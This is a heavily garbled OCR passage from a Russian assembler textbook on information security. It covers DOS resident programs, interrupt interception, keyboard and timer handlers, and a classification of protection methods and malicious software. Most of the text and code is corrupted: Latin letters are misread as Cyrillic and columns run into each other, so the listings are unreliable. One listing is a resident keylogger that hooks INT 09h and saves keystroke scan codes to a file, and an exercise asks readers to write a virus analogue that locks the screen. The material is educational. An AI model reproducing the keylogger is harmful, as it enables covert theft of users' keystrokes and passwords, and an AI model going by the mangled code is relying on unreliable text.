вания ПМТ 21. Перед освобождением памяти необходимо восстановить все ВП, "пере- 
хваченные" резидентной программой. Восстановление ВП иногда является 
неразрешимой задачей. Правильно восстановить "старое" содержимое ВП можно лишь 
в том случае, если этот вектор не был позже перехвачен другой резидентной програм- 
мой. Если же это произошло, в таблице ВП находится адрес не выгружаемой, а следую- 
щей Т$К-программы, которая "повиснет", лишившись средств своего запуска, если вос- 
становить "старое" содержимое ВП. Следовательно, прежде чем удалять Т$К- 

программу, необходимо убедиться в том, что она находится на вершине списка обработ- 
чиков прерываний, или, другими словами, ни одно из прерываний, используемых про- 
граммой, не было впоследствии перехвачено другой программой. 


1.3.6. — Системные средства поддержки 
резидентных программ 


ИМТ 271 


алла 


При вызове: 
С$ — сегментный адрес РР; 


ОХ — относительный адрес первого отбрасываемого байта. 
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оон и ип а пиано нааовваваа Навина оао а оао паи Бона но оон а а аа о ина ааа нано зна ао ааа аи вое нь ва о виа овикювиа 9 


Примечание 


Прерывание 276 не 
льзя использовать для сох 
Е анения 
по критической ошибке и Сы|-ВгеаК. ь обработчикое прерывани 


ИМТ 211, функция 258 


иное чнь ини задевая чьи ня 
и ззвиикозониинячино 
в розиннию 
занвееинаичкой дининивозконнимьния ... 
о некооерчиовизннию ужи 
и чкизки кони ноныии 
вузеннени 


Установка вектора прерываин: 
При вызове: 


АН = 258; 
АЁ — номер прерывания; 


05: ОХ — адрес обработчика прерывания (вектор прерывания). 


ИМТ 218, функция З1В 


кивок икяоваюньь 
крова зноя восоваюв 
оо ние о зави ня ки ия оное ков ии зикаауан 
вое зиао ны ькияни я 
иона ениики 
они евро вер ик инь зокае 


корове виь 


При вызове: 
АН = 31Ь; 


АГ — код возврата; 


ОХ - размер резидентной сек 
байтов). ции в параграфах (параграф — область памяти объемом 1 


ИМТ 21В, функция 358 


коек е ори ии роса кичикво они 
тира а ово коюоочиннии 
Иоанн ино сваю и чина ви чи ных ноу наи чизвоввие 
орви ви ви акки зи и аа и ции намикиее 


Чтение вектора прерывани; 
При вызове: 


АН = З5В; 

АЬ — номер прерывания. 
При возврате: 

ЕС: 


ВХ — адрес обработчика прерывания (вектор прерывания). 


Утекииияниаь 
текли нии ака кие ник кивикииикинииих 
Злые в ок кк оо коня и оси ким овиуааювок 
ооо квв ии ак киивюаяувова 
зорраяа они иа раки иакаилююю 


Освободить область памяти 
При вызове: 
АН = 49,; 


Е$ — й 
сегментный адрес освобождаемого блока памяти. 


4* 





оо 
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100 о леиииилониивннкиинанинивянииинянтиитнтииилниииняниии чим ие 
ВЫ `спр а1, 02 ; Это подфункция активизации ? 
, : 32 Зе{Т5к ; Если да, на активизацию 
При возврате: стр а1, ОЗн ; Это подфункция парализации ? 
СЕ = 0 ошибок нет; 32 С1еатТЗВ; Если да, на парализацию 
\ оытоЕНапа1ет2 ЕВ: 
СЕ = 1 - ошибка, | ` пр сз: 01942ЕВ 
дутп$: 
_ ошибки. А1геаду 
АХ — Код , оу а1, ОРЕВ; Код присутствия в памяти первой 
имеет ; копии программы 
р МуТЗВ перехватывает прерывания 2, и ОВ и . {те 
Г а точки входа: при запуске из командной СТР ;==== Выгрузка программы из памяти ===========================-ЕЕ=== 
т сомандам ТМТ 2ЕВ, ТТ аль и ТТ 608. Вепоуе: 
; и ; /В - выгрузка (Вепоуе), - ; Сохраним используемые регистры 
; Используемые ключи + 
! /5 - активизация (5 и раз 93 ез 9х 
; - парализация (С1еаг}. ; й 
вия БОВ прерывания 2ЕН с подфункциями: ' Восстановим м О вектора прерываний 
. ьзуется 
; 2) т оверки на повторную установку, 145 95, сз: 019608 
| ' 1 - выгрузки, . 10 218 
. 2 - активизации И то ах С ПаЕ 
; $ х, с3: 0 
; 3” м пи системой команды ГМ? 21. управление передается ме т" 
. ении . Если о 
; 3) При м он. Происходит анализ флага ЕпаБ1ет58 сли о ется по ах, 2521 
а те тв-программа активна, управление пере, 143 45, сз: О1421В 
О я адной, обработчик прерывания 21В, который "спепляе Е 21 | 
; на приклали обработчиком и поэтому завершается Кот ;Выгрузим окружение 
; С Ще ль Если флаг Епар]1ет5В = 0, управление СР оу ез, сз: 268 
. : 01 . . 
' и редется на "старый" обработчик прерывания 21 оу ав, 491 
| ‚ МОРЕЬ ЕЁлу 1 в 
. СОБЕ ;Выгрузим саму программу 
разр с5 
рор ез 
поу ар, 49 
11 21 
. . при запуске . 
Вед: пр 1п36а11 ; Точка о аки пя хранения ;Восстановим регистры а 
и ' х 
01821 00 : . "старых" ВП ОР. ез 93 
0142ЕВ в . ОВ, 22 6 о орраммы НИ 
: . шения рабо а оомеееятеа 
о В о ; флаг Хе ЗесТ5В: поу сз; БпаБ]ет5в, 1; Активизация программы 
| дЕЕЕЕЕЕЕЕЕЕРЕЕЕЕЕЕНЕЯТЯ"” , 
ФЕВ ====== 1теё 
„=== обработчик прерывания 
' р ы тр ав, ОрОв; Наша функция ? Пеахтзв: поу сз: Епар]ет$в, 0 ; Парализация программы 
И Мен2ЕВ: 502 ОзсОНапд1ет2 РВ т, на выход из обработчика „_ 1теё 
| ; ЕСЛИ ви оверки на р, Обработчик прерывания РН ======ЕЕЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ-- 
| сир а1, 00% ; Это подфункци ну установку? 211: спр, сз: ЕпаБШетсв, 1; Программа активна ? 
| ; ря а, на подтверждение: 32 Затем 21В ; Если да, на прикладную 
| 52 А] теаду!1з ' наличия первой копии ОЕНапа1 ть ; обработку прерывания 218 
| ' ^ > ег : . 
. это подфункция выгрузки : . , 
стр те ; Эт ”" сли да, на выгрузку тр сз; 013218 
32 ели ' 
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сЕат№м211: ООО ООО 
..- 302 Ши 
10% 60® ; Получим "хвост" команды из РР 
... оу с], ез: 80% 
пр сз: 019218 стр с1, 0 
ЕЕ обработчик прерывания 60 о оО 32 А]геаду 
Мемб0Н: сир с1, 3 
302 ЕгтКеу 





СтрТа1] Таз ]Ветоуе 


32 


Оп[п56а11 


СтрТа1] Та11$е® 


32 


Зе Мут$в 















































Та; 1Ветоуе ОВ ’ [В СпртТа11 Та11С1еаг 
Та115е< ОВ  [5' 32 С1еахМут5В 
Та11С1еах ° ОВ ’ /С’ ЕгтКеу: Оле5ег МезЕгтКеу 
МезВет ов ‚ПРОГРАММА МуТЗВ. СОМ, 8х101: поу — 4601 
ОВ "ВЫГРУЖЕНА ИЗ ПАМЯТИ’, 10, 13, 5! А 1% 218 
МезЕгг ОВ ‚ПРОГРАММА МУТЗВ.СОМ НЕ ' ут ' ктивизация программы 
ОВ "ЗАГРУЖЕНА", 10, 13, "$" зеемутЗВ: поу ах, 00002. 
Мез5ЕттКеу ОВ 'НЕПРАВИЛЬНЫЙ КЛЮЧ! ', 10, 13 00: ие 2ЕВ 
- ПВ ‚ПРАВИЛЬНЫЕ КЛЮЧИ: ', 10, 13 Ех1Е00: поу ах, 46008 
МезТпо БВ '/В - ВЫГРУЗКА', 10, 13 п 1 21ь 
В '/5 - АКТИВИЗАЦИЯ', 10, 13 а ' сарализация программы 
св ‚/С - ПАРАЛИЗАЦИЯ', 10, 13, '$' ватмут5В: пох ах, ОЗ 
Мез1п5 ОВ ' ПРОГРАММА МУТЗВ.СОМ ' ни 2% 
В ЗАГРУЖЕНА’, 10, 13, '$' В ур 2х1 00 
МезА]г ОВ ПРОГРАММА УЖЕ ЗАГРУЖЕНА’, 10, 13 1 ; Выгрузка программы 
ОВ 75! 1]п5$а11: пох ах, 000018 
;==== Макроопределение - поиск ключа ==-====ееее=е=ЕЕНЕРЕЕЕЕЫЕЕНЕЯЯЯ 10% , ЕВ 
СпрТаз1 МАСВО  Та11 ОЦЕЗЕЕ МезВем 
ПоУ сх, 3 5 Эр Ех 00 
по\ 9:, 815 ; Вывод сообщения о невозможности повторной 
поу 51, ОРЕЗЕТ Таз] А геаду: Обет МезА1т рной установки 
тер2 спрзЪ Ир Ех 01 
ЕМОМ тк: ;Установка программы в памяти 
уЕЕЗЗ Макроопределение - ВЫВОД строки еее ЕЕЕЕЕЕЕЕЕВЕЕЕНННЯЯННЯ ° , у 
ОбЕЗЕГ МАСВО — Мубег ; Установка ВП 60% 
оу ан, 0% поу ах, 35606 
оу 8х, ОЕЕЗЕТ Музег 10 218 
Е 21ь поу МОВР РТВ 01960, ъх 
ЕМОМ . шоу МОВО РТВ 019601+2, ез 
нии поу ах, 25601 
1п56а11: воу дх, ОРЕЗЕТ Менб0® 
; Проверка присутствия В памяти о. 10 21 
ОУ ах, 00000 ; Установка ВП 2ЕВ 
пе ЕВ . поу ах, З52Е 
стр а1, ОЕРЬ; Анализ кода возврата 1 218 


ПоУ ИОВ РТВ 01922, Ъх 





ИО, СИ 
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поУ ИОВ РТВ 0192Е№+2, е5 . Память 
Мех ах, 252ЕЪ | 
Прерывание Таблица 

поу = ах, ОЕРЗЕТ Мем2РЬ таймера прерываний 
а 218 18.2 разв 

; Установка ВИ 218 в секунду 
поУ ах, 35218 / 
цы 21 
ел ОВО РТВ 01921%, 5х 
поУ МОВР РТВ 019210+2, ез 
ПоУ ах, 25218 
по ах, ОРЕЗЕТ Мем2 18 —. 
те 21 Программа В10$ 






; Вывод сообщения об успешной установке программы и завершение отсчета времени 


| : Оце$Ег Мезп5 
Оцезег Мез1то 


116 1СВ 


ие дх, ОРЕЗЕТ Та11Ветоуе 
10 27Ь 
ЕМО Вед1п 


; Примечания, 
; 1) Размер "хвоста" хранится в ячейке РЗР со смещением 80, "хвост" 
; хранится в ячейках РЗР, начиная с ячейки со смещением 811, 














; завершается "хвост" кодом ООВ. == Прикладной 
; 2) Любая программа, загруженная в память, состоит из двух блоков: обработчик 
> е ния 
; собственно программы и ее окружения, Сегментный адрес окружения рерыва в 
; хранится в ячейке Р5Р со смещением 2С№. те ---А 
1.3.7. Взаимодеиствие с системными обработчиками Рис. 1.3.10. Использование прерывания от системного таймера в прикладной программе 
, . Прерыв й 
Рассмотрим особенности использования В прикладных программах прерываний м рерывание от таймера используется обычно в двух случаях: 
и аз . 

от таймера и клавиатуры. р работка ТВ-программ, активизирующихся при наступлении каких-либо собы 

Для того чтобы прикладные программы могли использовать прерывание от сис- м реальном масштабе времени; 

№ актив - я 

темного таймера, в системе предусмотрено программное прерывание 1СВ, вызов МТ ы изация каких-либо функций ТВ-программ, отложенных по каким-либо пр! 
1СЬ которого содержится в программе В!О$ отсчета времени (рис. 1.3.10). Вектор ам, например по соображениям безопасности. 








этого прерывания (020008: ОЕЕ530) суть адрес программы-заглушки, содержашей 
одну команду ТВЕТ. Если пользователь запишет в ВП 1СЬ адрес собственного обра: троллер клавиатуры формирует 

ботчика, каждый раз при возникновении прерывания от таймера (18,2 раза в сек) тельность скен-кодов)  оторый скен-кол (или в некоторыьх редких случаях послед 
управление будет получать его обработчик. денное с ней действие  нажагие тире не только саму клавишу, но и прой 


Каж 
ДЫЙ раз, когда мы нажимаем ИЛИ отпускаем любую клавишу (рис 1 3 11) } 
. 1.2. , 
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Контроллер 
прерываний 


ПЗУ 8105 


Нажатие 
или 

отжатие 
клавиши 


Обработчик прерывания 
от клавиатуры 




















Контроллер 
клавиатуры 















1) Считывание скен-кода 

2) Подтверждение ввода 

3) Работа со словом 
флагов и кольцевым 


буфером ввода 
4) Приказ ЕОТ 


Подтверждение 
ввода 


408: 18В 408: 178 
























Кольцевой буфер 
ввода 15 слов 





Головной 
указатель 
Хвостовой 
указатель 


Прикладная программа 






11% 168 Драйвер клавиатуры 8105 


рис. 1.3.11. Взаимодействие системы с клавиатурой 


Затем контроллер вырабатывает запрос внешнего аппаратного прерывания (с номером 
09), поступающий на вход ТВ ОТ контроллера прерываний. Системный обработчик прерыва" 
ния 09Н, получив управление, осуществляет следующую последовательность действий: 

ш считывает скен-код нажатой клавиши; 
№ посылает сигнал подтверждения ввода обратно в контроллер клавиатуры, 


ш анализирует состояние управляющих клавиш, считывая слово флагов клавиатуры 
(40: 186 — адрес старшего байта; 401: 17 — адрес младшего байта); 

Ш анализирует состояние хвостового указателя (адрес 408: 1СВ) осуществляет запис? 
слова (скен-АЗСИ или расширенный код АЗСП) в кольцевой буфер клавиатур 
(адреса 40Н: 1ЕВ ... 401: ЗС); 





1 


и формирует сигнал ЕО! для контроллера прерываний. 


Прикладная программа, желающая получить код нажатой клавиши, по команде | 

168 вызывает драйвер клавиатуры В!О$. Последний анализирует состояние гол. 

указателя (адрес 40: 1АВ) и осуществляет ввод информации из кольцевого буфе а“ 
Многие резидентные программы используют для своего запуска прерывание от кл 


ы. Эта ситуа я 
виатур итуация носит название активизация по "горячей" клавише. 


Во избежание конфликтов прикладная программа при перехвате системных прерь 
ваний должна стремиться передавать управление системному обработчику. Это тн 
сится и к перехвату прерываний от клавиатуры. Однако при перехвате прерывания 0° 
бывают ситуации, когда приходится полностью отказываться от обычной реакции 
это прерывание. В этом случае прикладной обработчик обязан сам выполнить ес 


вия, являющиеся обязательными для любог 
о обработчика прерывания 
ствиями являются: РР 09. Этими ле 


в подтверждение ввода кода символа — формирование импульса на старшей линии по 
та ВВ 61В контроллера клавиатуры; | 


и посылка приказа ЕО] в контроллер прерывания. 


Примеры 










;==== Структура прикладной 
; Т1ше - время задер 





рограммы с обработчиком прерывания 1С1. 
в секундах. 








; Обработчик прерывания 1СВ 


№1 Сп: 
стр сз: Е1ачЕп, 1 
2 ОиО{Напа1ет1 СВ 
ес с$: Соспе 
стр с$: Сойбпе, 0 
902 ОЕОЕНапа]ет1 СВ 
моу сз: Е]адЕп, 1 

ОпеОЁНапа1ег1СВ: тт 
] те 

адЕл ОВ 0 

сои ри Тпеж18 

' чрикладная программа 

Мех . т 

СВесх: сир с5: Р]ааЕп, 0 ; Повторяем цикл 

2 Мех СКеск 


; до обнаружения Е1адЕп = 1 


С 

- и Руктура прикладного обработчика О9Н, полностью 
аочающето системную обработку при нажатии 
а "горячую" клавишу со скен-кодом МуКеу. === 














ИИ 
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№ем091: разь ах 


п а1, 60% 

стр а1, МуКеу 

32 МуНап91ет 

рор ах } 

; Команда дптр сз: 019091 , 

ОВ ОБАВ ; КОП команды дир КАВ РТК 
019090ЕЕ 00 ? и 
0190915е9 00 ? 
МуНап ег: о 


; Прикладная обработка 
с13 

формирование сигнала подтверждения ввода 

; на входе старшего разряда порта ВВ 618 


1п а1, 611 
разВ ах 

ог а1, 80% 
ое 611, а1 
рор ах 

оп 618, а] 

; бормирование приказа ЕО 

поУ а1, 208 
оп 201, а1 
рор ах 
тес 


В результате сбоев аппаратуры или ошибочных действий пользователя может ни 
ся ситуация, когда дальнейшая работа программы оказывается невозможной. В это р 
управление получает специальный обработчик прерывания 248 (критическая [ ри 
Пользователь может и сам прервать программу, нажав комбинацию клавиш Си тии ть 
ВгеаК. При этом управление получают обработчики прерываний соответственно ми ро 
инициирующие процесс завершения. Этот сервис, к сожалению, ориентирован т р 
обычные программы и не будет работать в ТЗК-программах. При разработке резид 


НЫХ 
программ необходимо предусматривать либо собственную обработку исключитель | 


ситуаций, либо по крайней мере отменять существующую. 


т 








1.3.8. Использование системных вызовов 


в обработчиках внешних аппаратных 
прерываний 


Системные функции РОЗ и В1О$ нереентерабельны, т. е. не допускают повторного вхож- 
дения. Это означает, что одна копия функции в памяти не может одновременно вызываться 
несколькими процессами, так как различные реализации этой функции оказывают влияние 
друг на друга. Указанный факт существенно затрудняет написание обработчиков внешних 
аппаратных прерываний, использующих в своей работе системные вызовы. Внешние аппа- 
ратные прерывания происходят в случайные моменты времени, они могут возникнуть в том 
числе и тогда, когда процессор занят обработкой одного из системных прерываний. 

Причины нереентерабельности функций РОЗ и В10$ различны. Причиной нереенте- 
рабельности функций РОЗ является использование ими своего собственного стека 
(аточнее одного из трех внутренних стеков 2О5), в результате при повторном входе 
в процедуру обработчика после записи информации в стек оказываются уничтоженными 
данные, записанные в него при первом выполнении процедуры. 

В результате самым простым способом вывода информации на экран в обработчике 
внешних аппаратных прерываний является прямая запись данных в видеобуфер. Вызов 
файловых функций можно осуществить, если воспользоваться следующим фактом. Все 
функции РО$ можно условно! разделить на две группы — функции с номерами из диапазоне 
О... ОСЬ, т. е. функции ввода-вывода, и все оставшиеся функции (в том числе файловые) 
при этом каждая группа функций работает со своим стеком. Функции ввода при своей 
работе вызывают программное прерывание ПМТ 281, системный обработчик которого со- 
держит единственную команду ВЕТ. Прикладная программа, осуществляющая перехват 
этого прерывания, получив управление по команде ПМТ 281, может быть уверена, что в это? 
момент работает функция, использующая стек ввода-вывода, и поэтому допустим вызог 
файловых функций 20$, работающих с дисковым стеком. 

Большинство функций В1ОЗ фоормируют на входах соответствующего устройстве 
некую последовательность сигналов, временная диаграмма которой специфицирован: 
Для каждого конкретного УВВ. Именно это и является причиной нереентерабельность 
функций В1О$, так как при повторном входе в процедуру обработчика прерывания с тел 
Же номером, требуемая последовательность сигналов на входах УВВ не будет получена 
че сформировав до конца заданную последовательность сигналов, мы начинаем © 
повторную генерацию. , 

Рассмотрим пути преодоления рассмотренной проблемы на примере прерывания В1О0° 

Т 138. Прикладная программа, содержащая в обработчике вненшних аппаратных преры 
ний процедуру Ргос13В, использующую в своей работе вызовы этого прерывания, должн: 
ЛУчать управление при входе в системный обработчик ПМТ 131 и при выходе из него 
Ри этом в первом случае (при входе) прикладной обработчик прерывания 131 устанав: 














ливает флаг Р!аё13ЗВ занятости прерывания 13Ъ, а во втором случае (при выходе) этот 
флаг сбрасывает. 

Обработчик внешнего аппаратного прерывания перед вызовом "опасной" процедуры: 
Ргос13В опрашивает этот флаг и в случае обнаружения 0 передает управление Ргос1 31 
а после ее выполнения завершает свою работу. В противном случае, т. е. при обнаружс- 
нии факта занятости прерывания 136 (Еаз13} = 1) он устанавливает флаг КеаРгос1 ЗВ и, 
не выполнив процедуру Ргос1ЗВ, завершает свою работу. При получении управления по 
прерыванию от таймера, перехватчик которого в этом случае также должен быть в со- 
ставе программы, после выполнения системной процедуры происходит анализ флагов 
Веаргос13в и Раз13в. В случае обнаружения ситуации Веаргос13в = 1& Бар 1Зв = 0 
прикладной обработчик прерывания от таймера вызывает процедуру Ргос13Н, после ее 
выполнения сбрасывает флаг ВеаРгос1ЗН и завершает свою работу. В любом другом 
случае обработчик прерывания от таймера, не совершая больше никаких действий, 
завершает свою работу. 


Примеры 

;==== Перехватчик прерывания ТАТ 13в ============5==55======2=5=25=52=2== 
Е1а913в ОВ 0 . 
№135: 1пс сз: Е1а9138 

разНЕ | 

; Команда прямого дальнего вызова процедуры 

ОВ ЗАВ ; КОП 
0191 ЗВОЯЕ Ом 3 ; Адрес 
019131$е9 ОИ ? ; перехода 

дес сз: Р1аа13И 






;==== Перехватчик прерывания от таймера ====== 
№081: розПЁ 
: ; Команда прямого дальнего вызова процедуры 


ОВ ЗАВ ; КОП 
019408 ВОЕЕ ОИ ? ; Адрес 
01908 1$е9 ОИ ? ; перехода 
сир сз: ВеаРгос13В, 1 ; Есть запрос на 
. ; выполнение Ргос1 ЗВ ? 
12 ОчеОЕНап41ег08№ ; Если нет, на выход из 
; обработчика 
стр сз: Р1аа13Зв, 1 ; Прерывание 13. занято ? 
2 ОчЕОЕНап91ег08в ; Если да, на выход из 
; обработчика 
са11 Ргос13В ; Вызов Ргос1 ЗВ 
дес сз: ВеаРгос13№ ; Сброс флага 


О`ЕОЕНапа1ег0 81: 
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;==== Обработчик внешнего аппаратного прерывания =================== 





веаРгос1 38 ОВ 0 
о1атпе |9) 2 
№ечТ пе: 
ны Е та9т ЗВ, 1 ; Прерывание 131 занято ? 
есЕ1ад ; Если 
2 ета да, на установку флага 
1теё 
сесг1аа: 1пс с$: ВеаРтос]31 ; Установка флага 
1теё 
}==== Процедура Ргос13ЗВ ==== 
Ргос1 31: 
106 13 
ге 





р==== 


‚== конфиденциальных текстах, паролях пользователей и т. п 


. МОБЕЬ &1пу 
. СОЕ 
| ОВС 1008 
Вед1т: Эр Тп36а11 
ные резидентной секции ====Е====ЕЕЕЕЕЕЕЕНЕЕЕЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЯ 
ме ыы } ; Ячейка для хранения "старого" ВП 098 
ИВ р А ; Ячейка для хранения "старого" ВЦ 28® 
ВЕ . ; лаг разрешения записи в файл 
а о ; Флаг разрешения записи в буфер 
ри 5 му 1е.51п',0 ; Имя файла в формате АЗСТТ? 
ть и , ; Число нажатий и отжатий клавиш 
м и ОН НЫ операций записи в буфер 


; Буфер для записи 
._ ; скен-кодов нажатых клавиш 


и====== Ваш обработчик прерывания 098 ==================== 
Мено9н; разь 95 и 





Ш ид сиооОии 



























































’ 


, 


В 


стр 
32 


ра5Н 
поУ 
поу 
воу 
106 
с 

воу 
ие 
поУ 
ие 
о Веы 
воу 
1 


112 
разВ с5 
рор 95 
; Проверим флаг ЕомгВоЁ, если ЕпихВаЕ = 1, запись в буфер ВаЕ, 
; в противном случае - переход на "старый" обработчик 09 
стр ЕПИтВиЕ, 0 
32 Оч ОЕНап91ех098 
разв ах 5х 
п а1, 601 ; Считывание скен-кода клавиши 
ие рх, Содпе ; Считывание значения Сочпе 
ет Во [Ъх],а1 ; Запись скен-кода`в-буфер Во 
пс Сочпе ; Увеличение содержимого Соипе на 1 
стр рх, Мах ; Сравнение значения Сочпе 
‚ со значением Мах 
12 ВоЕМоЕи11 
поу ЕПИхВаЁ, 0 ; Буфер полон 
поу ЕПИТЕ11е, 1 ; Разрешение записи в файл 
ВоЕ№(Е11: 
рор’ рх ах 
ОоЕОЕНапа1ет0 ЭВ: 
рор 95 
Этр Оиовр РТВ сз: 019098 
. ; переход на "старый" обработчик о9ь 
:===== Наш обработчик прерывания 28. ЕЕЕЕЕЕЕЕЕВЕЕНЕЕЕЕЕЕЕЕНЕЕНЯНЯЯЯЯ 
№281: разй 95 у 
разВ с5 
рор 95 
; Переход на "старый" обработчик 28 
ра$ВЕ 
са11 РМОВР РТВ 01928 


. Если ЕПИгЕ:1е = 0, на выход из обработчика, в противном 
‚ случае - запись содержимого буфера ВаЁ в файл Кеу.Ъ1п 


ЕПИТЕ!11е, 0 
ОчЕ0{Нап91ег28 


. Запись содержимого буфера ВаЁ в файл муЕ11е.51п 


ах 5х сх 9х 

ай, Зсй 

сх, 2 

4х, ОРЕЗЕТ ЕМате 
7 ; Открытие файла 
ЕПАЙ: 

рх, ах 

ав, 40% 

сх, 100 

вх, ОРЕЗЕТ ВиЁ 

1 ; Запись в файл 

ав, Зев " 

1 ; Закрытие файла 


; Атрибут файла 


лава 1. Основы программирования на Ассемблере 1ВМ РС 


родиг: му ВПИгЕ1]е, 0 
рор ах сх Бх ах 
оокоЕНапатет 28: 
рор 95 
1геё 
дез811е = $ - Вед1п 
знаке Установочная секция программы =====================ЕНЕ=ЕЕ 
55а: а 


; Чтение "старого" ВП 09} и запись его в ячейку 019091 
; Запись в таблицу векторов прерываний "нового" ВП ов. 


шоу ах, 35098 

106 218 - 

поу МОВО РТК 019091, Ъх 
по ИОВО РТВ 019091+2, ез 
ОУ ах, 25091 

поу 9х, ОРЕЗЕТ №098 

116 218 


; Чтение "старого" ВП 28}, запись его в ячейку 01328 
; запись в Таблицу векторов прерываний "нового" ВП 28 


поу ах, 35281 
11 215 
поу МОК РТК 01928, Ьх 
по МОВО РТВ/019281+2, ез 
поу ах, 25288 
поу 9х, ОРЕРЗЕТ №28 
106 218 

; Завершение программы и оставление ее резидентной 
поу ах, 31001 
поу ах, (Вез$12е+101Н) /16 
116 21% 
ЕКО Вед! п 


Задания для самостоятельной работы 


113 


рабо 
. е тать программу контроля целостности файлов методом сравнения с эталонными 
начениями Й 
С . контрольных сумм (КС) файлов, хранящимися в специальном файле- 
правочнике. Процедуру формирования КС области памяти оформить как обработчик 


прерывания ПМТ 608. 


бо ать ре е [2 у е ес у онально: 


Назначение клавиш ЕЗ иЕ!0. 


3) Раз 
т резидентную программу-сторож, контролирующую процесс установки 
мы ра тр я м по прерыванию ПМТ 21В, функция 318. Установка резидентной програм- 
ется только в том случае, когда КС резидентной секции равно 0. Преду- 


Смотр > 





4) Разработать резидентную прогр 


Ассемблер в задачах зациты информа И 
амму — аналог первого советского вируса. В определенных 


ан очищается и в ег, 
атные прерывания, экр. 

блокируются внешние аппар о 
ны родится сообщение "Хочу чучу!". Восстановление экрана и снятие блокировки 
центр выво. 


ствляется только после ввода "чуча". р Пет 
работать резидентную программу, обеспечивающую защиту файла С хт 
азр 


При обращении к этому файлу для запис 


аления 

ВИЯ. При попытке уд . 

нование а по истечении некоторого времени файл восстанавливается 
) 


и или чтения осуществляется перенаправлье. 


азанные дейст. 
й й „ТХТ, с которым и производятся ук 
и С ада СГЕШЕ.ТХТ происходит его временное переиме. 
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Программирование алгоритмов 
защиты информации 


2.1. Классификация методов защиты информации 


На рис. 2.1.1 показана классификация методов защиты информации от умышленных дест 


руктивных воздействий, среди которых можно выделить методы защиты от несанкциониро 
ванного доступа (НСД) к информации, методы защиты от разрушающих программных воз 
действий (РПВ) и организационные методы защиты, направленные на защиту от НСД, защит 
от РПВ, совершенствование защиты и восстановление информации. На рис. 2.1.2 показан 
классификация методов защиты информации от случайных деструктивных воздействий. 


РПВ принято называть проёраммы, способные выполнять любое непустое подмноже 
ство перечисленных ниже’‘функций: 

скрывать признаки своего присутствия в компьютерной системе (КС); 

обладать способностью к самодублированию; 


обладать способностью к ассоциированию себя с другими программами; 


обладать способностью к переносу своих 


фрагментов в иные области оперативно: 
или внешней памяти; 


разрушать или искажать код программ в оперативной памяти; 


наблюдать за процессами об 
‘редств защиты; 


Сохранять фрагменты ин 
внешней памяти; 

Искажать, блоки 
СВЯЗИ инф 
Программ; 


работки информации и принципами функционировани; 
формации из оперативной памяти в некоторой области 


ровать или подменять выводимый во внешнюю память или кана) 
ормационный массив, образовавшийся в результате работы прикладных 


ис м 
кажать находящиеся во внешней памяти массивы данных; 
подавлять ИН 


формационный обмен в компьютерных сетях, фальсифицироват! 
рмацию в каналах связи; 
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Ш нейтрализовывать работу тестовых программ и средств защиты информационны, 
ресурсов КС; у | 

Ш постоянно или кратковременно (что опаснее) подменять или понижать стойкость ис. 
пользуемых криптоалгоритмов; 

ш постоянно или кратковременно изменять степень защищенности секретных данных; 

ш приводить в неработоспособное состояние или разрушать компоненты системы; 

Ш создавать скрытые каналы передачи данных; 

Ш инициировать ранее внедренные РПВ. 


Примерами РПВ являются компьютерные вирусы (КВ), черви и троянские кони. 

"Лекарства" даже от простейшего вида РПВ, вирусов (см. главу 3), не существует. 
Математически доказано, что всегда можно написать вирус, который не сможет нейтра. 
лизовать ни одна из существующих антивирусных программ. Основная идея в том, что 
если разработчик КВ знает, что именно ищет антивирусная программа, он всегда спосо. 
бен разработать РПВ, незаметное для нее. Конечно, после этого создатели антивируснь» 
средств могут усовершенствовать свои продукты, чтобы они определяли уже и новы} 
вирус, таким образом возвращая ситуацию в исходное положение. 

Троянский конь — вредоносный код, маскирующийся под безвредную или полезнук 
программу. С формальной точки зрения, код, который пользователь сознательно разме 
щает в системе, — это троянский конь, а код, который вводит в систему кто-то другой 
называют логической бомбой. 

Из всех методов защиты от РПВ, показанных на рис. 2.1.1, наибольшего внимани 
заслуживают внесение неопределенности в работу объектов и средств защиты и создани 
ложных объектов атаки (по сути, приманок). 
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Методы Методы [©] 
рганизационные 
| защиты от нсд защиты от РПВ методы щи ы 
ПП |. — | — 
_ 
Разграничение Межсетевое Ограничение 
| доступа _| экранирование _| доступа 
| 
Разделение Обнаружение Обязательное |] 
доступа вторжений {10$} сканирование 
| Е всей входящей 
Криптографическое Анализ информации 
преобразование защищенности 
анирование Периодическое 
УО$ДдДд звимостей 
еганографическое сканирование 
преобразование дисков 
Внесение 
неопределенности Опе 
ти 
Очистка . в работу объектов ранена 
освобождающейся и средств защиты обнаруженных 
памяти ОИ уязвимостей 
о 7 
[ Создание Можных 
Обнаружение объектов атаки Периодическое ] 
несанкционирован- ] обновление 
ных изменений ключевой 
сиспользованием [© 
р тегоанализ и 
контрольных кодов нформации 
целостности 7 
Сигнатурный Периодический 
анализ анализ 
защищенности 
Эвристический 
анализ Обучение 
пользователей 
нии 
основам 
Эмуляция информационной 
процессора безопасности 
= г 1 
Блокировка Аудит 
потенциально опасных Ола, 
действий 
С Резервное 
Контроль хода копирование 
выполнения м—— 
программ 








Рис 
. 21. Классификация методов защить! информации 
м Е - Н 
умышленных деструктивных воздействий. Выделены стохастические методы защиты 


О 

рано мным достоинством двух отмеченных методов защиты в отличие от межсетевы? 

ре и систем обнаружения вторжений является то, что в обоих случаях защита имее" 
Имущество перед нападением. В первом случае противник оказывается в ситуации 


ког 
да он не понимает поведение атакуемого компонента системы. 





ОА ААА ООО ООВ ИИИИИИИ 
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Создавая ЛОА, администратор безопасности знает, как выглядит сеть И ЧТО В ней 
происходит. В качестве приманок он может использовать любые компоненты защищаь. 
мой компьютерной сети, зная, что ни один из законных пользователей никогда не полу. 
чит доступ к ним. Он может использовать любые виды сигнализации, постоянно Вклк. 
чая, выключая и меняя их. Иначе говоря, он может делать все, что считает необходимым, 
При этом ЛОА действуют наверняка, так как хакер не имеет информации, где И когда 
они могут появиться. ЛОА должны быть снабжены средствами сигнализации В случае 
осуществления нападения и слежения за действиями РПВ. В качестве ЛОА могут выст . 
пать отдельные компьютеры и даже фрагменты защищенной сети. у 





Методы защиты информации от случайных деструктивных воздействий 





















| Помехоустойчивое кодирование ] 
|. Контролепригодное и отказоустойчивое проектирование ] 
| Автономное и встроенное диагностирование компонентов КС | 








| Контроль хода выполнения программ 





рис. 2.1.2. Классификация методов защиты информации от случайных деструктивных воздействи- 
Выделены стохастические методы защиты 


22. Стохастические методы защиты информации 


Стохастическими методами защиты в широком смысле принято называть методы зашить 
информации, прямо или косвенно основанные на использовании генераторов псевдослуча! 
ных последовательностей (ПСП). При этом эффективность защиты в значительной стеле! 
